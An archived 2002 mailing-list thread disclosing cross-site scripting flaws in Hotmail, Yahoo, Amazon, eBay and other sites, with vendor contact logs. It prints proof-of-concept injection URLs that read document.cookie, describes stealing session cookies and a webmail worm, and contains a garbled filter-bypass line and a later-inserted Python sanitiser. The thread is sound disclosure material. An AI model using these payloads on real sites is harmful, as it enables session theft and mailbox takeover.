RE: Cross site scripting in almost every major website
Hello,

We have discovered this quite a while ago (when investigating GM#001-IE, actually) and have verified it to work on the following services/applications:

* hotmail.com
* msn.com
* yahoo.com
* mail.com
* iname.com
* lycos.com
* excite.com
* Qualcomm Eudora

The code published by SkyLined is obviously a slightly altered version of the data binding code that appears in GM#001-IE (even the elements' ids remained the same), so we feel that an acknowledgment was in place. Either way, we were planning to release this after we had the opportunity to contact each and every vendor in the above list, but since this is out in the open there's no reason for that now.

A little example of embedding an iframe:

<iframe src="http://security.greymagic.com/adv/gm001-ie/"></iframe>

When trying to inject script into yahoo (and others) using events such as onerror, yahoo tries to filter them out even if they appear inside the element. This can be easily bypassed by using onerror instead of onerror, for example.

Regards.

-----Original Message-----
From: Berend-Jan Wever [mailto:[EMAIL PROTECTED]]
Sent: Sunday, April 21, 2002 12:50
To: [EMAIL PROTECTED]
Subject: Re: Cross site scripting in almost every major website

Been there, done that. I have successfully created a worm and tested it before trying to report this to McAfee, they do the virus scanning for hotmail. I got a "you are not a registered user" auto-reply and they ignored my messages because I wasn't in their files ;( too bad for them.

You do have full access to the DOM of Hotmail when you can find a way to cross-site script, thus allowing you full access to the inbox, address book etc...

BJ

----- Original Message -----
From: FozZy
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED] ; vuln-[EMAIL PROTECTED]
Sent: Sunday, April 21, 2002 3:53
Subject: Re: Cross site scripting in almost every major website

To webmail developers: there is something interesting for you hidden in this post.

The Hotmail problem was an "evil html filtering" problem in incoming e-mails. It was possible to bypass the filter by injecting javascript with XML, when parsed with IE. See: http://spoor12.edup.tudelft.nl/SkyLined/docs/ie.hotmail.howto.css.html

*** I guess that many other webmails are vulnerable to this attack. ***

I verified that Yahoo is vulnerable with IE 5.5 (but they have other bugs and they don't care, see http://online.securityfocus.com/archive/1/265464). I did not check other webmails, but I am sure almost every one can be cracked this way.

> The fix: as far as I could find out they now replace
> the properties 'dataFld', 'dataFormatAs'
> and 'dataSrc' of any HTML tag
> with 'xdataFld', 'xdataFormatAs' and 'xdataSrc' to
> prevent XML generation of HTML altogether.

The implication of executing javascript is that an incoming email can control the mailbox of the user. It is also possible to send the session cookie to a cgi script and read remotely all the e-mails. (BTW, it is still possible to do that on Hotmail and on almost every webmail, since they don't check the IP address, even without this XML trick cause their filters are sooo bad)

I fear that a cross-platform and cross-site webmail worm deleting all the emails and spreading could appear in the near future. Please Hotmail Yahoo & co, do something before it comes true...

FozZy
Hackademy / Hackerz Voice
http://www.dmpfrance.com/inted.html
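A defender's counterpart to the thread, added here and not code from any of the posters or from Hotmail/Yahoo: a minimal allow-list sanitiser for untrusted e-mail HTML using only the Python standard library. It drops the IE data-binding attributes rather than renaming them as the quoted Hotmail fix does, removes every on* attribute by case-normalised name rather than by literal spelling, and refuses style values containing function calls such as expression(). The tag and attribute allow-lists are assumptions chosen for illustration.

```python
from html import escape
from html.parser import HTMLParser

# Allow-list: anything not named here is dropped, including <script>, <iframe>
# and <xml> (the XML data island that IE data binding reads from).
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "a", "div", "span", "ul", "ol", "li", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}, "div": {"style"}, "span": {"style"}}
# IE data-binding attributes; dropped outright instead of being renamed to xdata*.
DATA_BINDING = {"datafld", "datasrc", "dataformatas"}


def safe_url(value):
    # Only plain web/mail schemes are accepted for href/src.
    return value.strip().lower().startswith(("http://", "https://", "mailto:"))


class MailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            name = name.lower()          # attribute names are case-insensitive in HTML,
            value = value or ""          # so never filter on one literal spelling
            if name.startswith("on") or name in DATA_BINDING:
                continue                 # every event handler, every data-binding hook
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name in ("href", "src") and not safe_url(value):
                continue
            if name == "style" and "(" in value:
                continue                 # refuses expression(...) and url(...) wholesale
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))    # text is re-escaped, so stray markup stays inert


def sanitize(html):
    # Returns a sanitised rendering of an untrusted e-mail body.
    parser = MailSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)
```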
Cross site scripting in almost every major website
On April 26 I posted a message about Cross-Site scripting (see bottom). I mentioned that I had found Cross-site scripting flaws in many major websites but I did not publish the exact details of these flaws. After notifying the owners of these sites and giving them time to respond and fix the problem, I now feel I have to post the details to bugtraq.

This information and more on cross-site scripting can also be found on my website http://spoor12.edup.tudelft.nl/skylined which is updated almost daily.

Kind regards,
Berend-Jan Wever.

Cross-site scripting archive:

Here are all the sites that I know to have at least one cross-site scripting flaw. I have logged all the communication I have had with them. (Last update April 19, 2002)

www.search.com
http://www.search.com/search?q='>'
- 23 mar 2002 Reported @ "http://www.cnet.com/cnetsupport/contact/1,10161,0-3945,00.html"
- 28 mar 2002 Reported @ "http://www.search.com/feedback/"
--
www.altavista.com
http://www.altavista.com/sites/search/web?q=*&kl=">
- 23 mar 2002 Reported @ "http://help.altavista.com/contact/search"
- 25 mar 2002 Reply by email: "We have forwarded your email to our engineering team for further investigation"
--
edit.yahoo.com
http://edit.yahoo.com/config?.done="%20style="width:expression(document.write(document.cookie));
- 27 mar 2002 Reported to "arturo@yahoo-inc.com", "[EMAIL PROTECTED]"
--
search.netscape.com
addressbook.netscape.com
http://search.netscape.com/search.psp?search=">
http://addressbook.netscape.com/search.adp?SearchStr=">
(Addressbook.netscape.com requires you to be logged in)
- 23 mar 2002 Reported @ "http://help.netscape.com/website/feedback.html"
--
cq-search.ebay.com
http://cq-search.ebay.com/search/search.dll?MfcISAPICommand=GetResult&ht=">&query=a
- 26 mar 2002 Reported to "[EMAIL PROTECTED]"
- 27 mar 2002 Reply by email: "Reviewing the issue", "Do you have any suggestions?"
- 27 mar 2002 Gave some hints and told them about my CSS howto.
--
www.amazon.com
http://www.amazon.com/exec/obidos/ASIN/B5T68P/ref%3D%20style%3Dwidth%3Aexpression%28document.write%28document.cookie%29%29%20/
- 23 mar 2002 Reported @ "http://www.amazon.com/exec/obidos/handle-generic-form/102-3185800-6674542?action=next-page&target=stores/help/self-service-email-form-dispatch.html&display=basic&browse=560710&method=GET&cgi-post-result=1/102-3185800-6674542."
- 26 mar 2002 "[EMAIL PROTECTED]" responded to my bugtraq post
- 26 mar 2002 Reported to "[EMAIL PROTECTED]"
- 26 mar 2002 Told them about my CSS howto.
--
www.looksmart.com
cnn.looksmart.com
http://www.looksmart.com/r_search?look=&key=>
http://cnn.looksmart.com/r_search?look=&key=>
- 23 mar 2002 Reported to "[EMAIL PROTECTED]"
--
www.time.com
http://www.time.com/time/searchresults?query=a&summaries="%20style="width:expression(document.write(document.cookie))"
- 23 mar 2002 Reported to "[EMAIL PROTECTED]"
- 26 mar 2002 Reported to "[EMAIL PROTECTED]"
--
www.infospace.com
http://www.infospace.com/info.xcite/dog/newsresults.htm?&qkw=">&qcat=news&fs=nws
- 23 mar 2002 Reported @ "http://www.infospace.com/info/redirs_all.htm?pgtarg=abtct&"
--
www.lasseters.com.au
http://www.lasseters.com.au/default3.asp?Network="%20onload="alert(document.cookie);"%20z="
- 28 mar 2002 Reported @ "http://www.lasseters.com.au/help/onetoone.html" to Karl F (chatid 114640)
- 28 mar 2002 Reported to "[EMAIL PROTECTED]"
- 28 mar 2002 (Automated) reply by email: "our priority is to respond to your query as soon as possible", tracking number T20020328004M
- 28 mar 2002 Reply by email: "We are investigating this issue very seriously", "I have passed this information onto the relevant department"
-